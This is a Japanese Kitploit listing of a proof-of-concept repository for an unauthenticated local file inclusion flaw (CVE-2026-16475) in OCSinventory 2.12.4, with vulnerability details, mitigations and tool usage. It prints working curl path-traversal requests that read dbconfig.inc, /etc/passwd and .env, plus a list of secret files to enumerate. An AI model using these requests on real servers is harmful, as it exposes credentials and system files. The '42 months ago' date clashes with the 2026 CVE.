Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-16475-PoC — OCSinventory 2.12.4 における LFI(ローカルファイルインクルード)脆弱性 CVE-2026-16475 の PoC を含む公式リポジトリです。 | Kitploit
ツール/GitHubGitHub/afertar/cve-2026-16475-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

OCSinventory 2.12.4 における LFI(ローカルファイルインクルード)脆弱性 CVE-2026-16475 の PoC を含む公式リポジトリです。

リポジトリを見る
42ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-16475 - OCSinventory LFI PoC

OCSinventory 2.12.4 におけるローカルファイルインクルード(LFI)の脆弱性

脆弱性の詳細

CVE ID: CVE-2026-16475
CVSS スコア: 6.9(中)
CWE: CWE-98(PHPプログラムにおけるInclude/Require文のファイル名の不適切な制御)
影響を受けるバージョン: OCSinventory 2.12.4
ステータス: 最新バージョンでパッチ適用済み

説明

動的なXMLファイルインクルード操作で使用される前に linkedoptions パラメータのサニタイズが不適切であるため、/ajax/teledeployoptions.php エンドポイントにローカルファイルインクルード(LFI)の脆弱性が存在します。

このエンドポイントはXML設定ファイルを読み込むように設計されていますが、linkedoptions パラメータを適切に検証しないため、パストラバーサル攻撃が可能になります。

認証されていないリモートの攻撃者は、この脆弱性を悪用して以下を行うことができます:

  • アプリケーションディレクトリ内の任意のXMLファイルをインクルードしてアクセスする
  • XMLパーサーのエラーメッセージを介して非XMLファイルを読み取る
  • 内部アプリケーションリソースに関する機密情報を開示する
  • システムファイルを列挙し、OSフィンガープリンティングを実行する

影響

  • 機密性: 高 - 任意のファイル(設定ファイル、ソースコード、ログ、システムファイル)へのアクセス
  • 完全性: なし
  • 可用性: なし
  • 認証の必要性: なし
  • ユーザー操作: なし

使用方法

前提条件

pip install -r requirements.txt

Python バージョン(推奨)

python3 exploit.py -u http://target.com -v

オプション:

  • -u, --url - ターゲットURL(必須)
  • -v, --verbose - 詳細出力
  • -o, --output - 成功した読み取り結果をファイルに保存

例:

python3 exploit.py -u http://ocs.example.com -v -o results.txt

Bash バージョン

./lfi_test.sh

スクリプト内の BASE_URL 変数を編集します:

BASE_URL="http://target.com/ajax/teledeployoptions.php"

列挙対象

  • アプリケーション設定ファイル(dbconfig.inc、.env、config.inc)
  • XML作業ファイル(bashscriptopt、executableopt、msiapplicationopt)
  • システムログ(apache2、mysql、auth)
  • システムファイル(/proc/、/etc/)
  • アプリケーションの秘密情報(composer、パッケージファイル、.htaccess)

悪用例

# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"

# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"

# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"

対策

ユーザー向け:

  • OCSinventoryを直ちに最新バージョンに更新する
  • ディレクトリトラバーサルのパターンをブロックするWAFルールを導入する

開発者向け:

  • パストラバーサルを防ぐために basename() または類似の関数を使用する
  • ファイル操作の前にすべてのユーザー入力を検証およびサニタイズする
  • 適切なアクセス制御を実装する
  • 有効なファイルパスに許可リストを使用する

参照

  • INCIBEアドバイザリ(ES) - 公式CVE調整機関
  • OCS Inventory GitHub
  • OWASP パストラバーサル
  • CWE-98 定義

注記: CVE-2026-16475 は INCIBE を通じて調整されており、NVD にはまだ索引付けされていない可能性があります。信頼できる情報については INCIBE の情報源を確認してください。

法的免責事項

教育および許可されたテストのみを対象としています

完全な法的通知については DISCLAIMER.md を参照してください。

著者

Adrián Ferrer Tarí


責任ある開示は INCIBE を通じて調整されました

ツールをダウンロード